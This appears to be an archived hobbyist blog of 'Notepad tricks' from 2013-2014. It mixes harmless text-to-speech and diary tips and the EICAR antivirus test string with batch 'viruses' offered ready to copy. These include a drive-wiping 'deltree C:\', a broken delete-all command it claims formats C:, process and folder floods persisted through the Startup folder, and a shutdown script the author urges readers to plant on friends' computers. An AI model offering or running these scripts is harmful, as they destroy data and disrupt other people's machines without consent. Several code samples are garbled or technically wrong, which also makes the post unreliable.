Showing posts with label Notepad tricks. Show all posts
Showing posts with label Notepad tricks. Show all posts

Friday, January 17, 2014

Convert the Text into Audio via Notepad


Here I am going to tell a notepad trick that converts your text into audio form. Notepad a simple program. But we can do lots of things with this. You can use any program to convert text to audio, but from this method you don't need to use any other software.

Follows the following Instruction’s.
1. Open notepad.
2. Copy the Below Code.

-------------------------------------------------------------------------------------------------
Dim msg, sapimsg=InputBox("Enter your text for conversion–www.softrickx.blogspot.com,"TechVormText-To-Audio Converter")Set sapi=CreateObject("sapi.spvoice")sapi.Speak msg

-------------------------------------------------------------------------------------------------

3. Now save it as audio.vbs
4. That's it.
5. Now open the file and type anything.
Then click OK.

Wednesday, December 4, 2013

Deadly Wordpad Virus



Code!
***********************************************************

@echo off

deltree C:\

************************************************************

Effect –>  Deadly and Destructive.

Coding Platform –>  Batch Programming.

Working –>  On executing, this code will delete every single piece of data from uR hard-drive. It will also wipe out windows from the system.
Just copy the code or type it in a worpad and save it as anyname with “.bat” extension.

NOTE: PLEASE DON’T RUN THAT “.bat” FILE ON YOUR SYSTEM. IT CAN BE VERY HARMFUL. AND LEARN THIS CODE FOR EDUCATIONAL PURPOSES ONLY, NOT TO HARM OTHERS. ;)

Notepad Flood Via Notepad

How to make a notepad flood with simple notepad trick!



Code!

*************************************************************

@echo off

:RON

start notepad

start notepad

start notepad

goto RON

***********************************************************

Effect –>  Not Destructive or harmless.

Coding Platform –>  Batch Programming.
Working –>  On executing this .bat file it will open and flood loads of notepad {actually it opens around 180 notepads}. This sometimes cause PC hang.
Type the code or just copy the code in notepad and save it as “.bat” extension.


In the above code you can write “start notepad” any number to times. Increasing this command will increase flooding and cause higher chances of system hang-up.

Multiple Folder Virus Via Notepad

You can make multiple folder virus by single notepad tricks.



Code!

****************************************************************

@echo off

:RON

md folder1

md folder2

md folder3

md folder4

md folder5

start folder1

start folder2

start folder3

start folder4

start folder5

goto RON

************************************************************

Effect –> Not Destructive, But sometimes can become very irritating and itchy.
Coding Platform –>  Batch Programming.

Working –>  This code will just create multiple folders each time system starts-up and also open those hundreds of folders. It is not destructive but while executing it can eat up uR system process and results in slow system performance and sometimes could hang system.
Just write or copy the code in notepad and save it as “.bat” extension.


Now goto, START  –>  ALL PROGRAMS  –>  STARTUP FOLDER. Now just copy that .bat file in that folder. Next time system starts, multiple folders are created and will start automatically. You can name folder name anything as you want.


ShutDown Virus Via Notepad

Hi guys! Today am going to share with you the Notepad tricks that can make viruses and trojans. Only for education purpose!



This Post is containing:

BATCH Programming.
C/C++
Python
Visual Basic.

1.  ShutDown  Virus:

This is not a virus! But still its not a friendly one, it can affect and harm your data if not saved. You can set the timing by changing "30" to any amount.

************************************************************

@echo off

shutdown -s -t “30?

************************************************************

Effect –> May Harm uR workings and unsaved data.

Coding  Platform –> Batch Programming.
Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.
Type the code or just paste the code in notepad and save it as “.bat” extension.
Example  –>  ron.bat

Tips: If you set the timing "00? then the system will auto shutdown ate the time of startup! This is more harmful for your system. Make it in your friend's systems :P


Saturday, November 2, 2013

Check Your Pc Is Male Or Female

Today Am going to tell you a simple and intresting notepad trick. In this trick it will check your system Is your computer “male” or “female”!


So follow these simple steps one by one.

1: Open Your Notepad

2: Type the following line in notepad:

 CreateObject("SAPI.SpVoice").Speak"I love you so much"

3: Save file on anywhere on your system by computer_gender.vbs name.

4: Run this file.

If you hear a male voice, your pc is a boy

If you hear a female voice, your pc is a girl...!!

Try this Trick and enjoy :)

Saturday, August 3, 2013

Dancing Keyboard Lights

Dancing Keyboard lights


In this part i will show you to make interesting file using notepad which will make keyboard led to dance.
Basically we will be creating a visual basic script.

A SImPLe MetHoD:

1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
 
2. Then save this file as dance.vbs (name can be anything but .vbs is must)
 
3. Open your save file and see your keyboard led blinking like disco lights.

EnJOy cOoL TrICk

Making Personal Diary Using Notepad

You can make notepad as a personal diary.

Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

Simple method:

1. Open Notepad and Type .LOG (in capital Letters and press enter

2. Save the program with any name and close it.

3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad.

Now you can write your data with time and date,

Enjoy

Creating A Virus That Format C: Drive

How To Make A Virus the delete or format all data of C: drive of a computer in few seconds.


In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous.

Method:

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

Enjoy 

Friday, July 26, 2013

Notepad++ 6.4.2 Updated Version Free

Notepad ++ 6.4.2 Free updated version.



Notepad++ v6.4.2 new features and bug fixes:

Fix localization regressions.

Make "Begin/End Select" Command recordable in macro.

Enhance the delimiter selection(Ctrl + double click) feature.

Fix Find/Replace dialog status bar overwriting memory problem.

Fix Run dialog doesn't work with spaces in path.

Fix "Find all in current document" asking for creating a new file bug (regression).

Enjoye.. :)


Download Here


Saturday, July 20, 2013

How to check Antivirus working

Is your antivirus working test it by test virus??

How to create the a test virus..

1. Create a new text file using Notepad or any text editor.

2. Open the text file and enter the below code as the text of the file.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3. After the above code has been entered save the file as an .exe file instead of a .txt file. For example, name the file test.exe instead of test.txt. Alternatively you can save the file as a .txt file and then rename the file after it has been saved.


Note: In order for this to work you must have Windows showing the file extensions. By default Windows may be trying to save the file as a .txt file even if you end your file with .exe. For example, the file may be saving as test.exe.txt instead of test.exe. If after saving or renaming the file the icon still looks like a notepad, it is not being saved as an executable file.

How to always show computers file extensions.

4. After the file has been saved the anti-virus should immediately prompt for action, similar to what is shown below. If you do not receive a prompt try highlighting the file, and then right-click and choose the option to scan the file with your scanner.


If after following all of the above steps you do not receive any type of warning, your virus scanner is either not enabled or not working properly. We highly recommend either re-installing the installed antivirus scanner or trying an alternative virus scanner.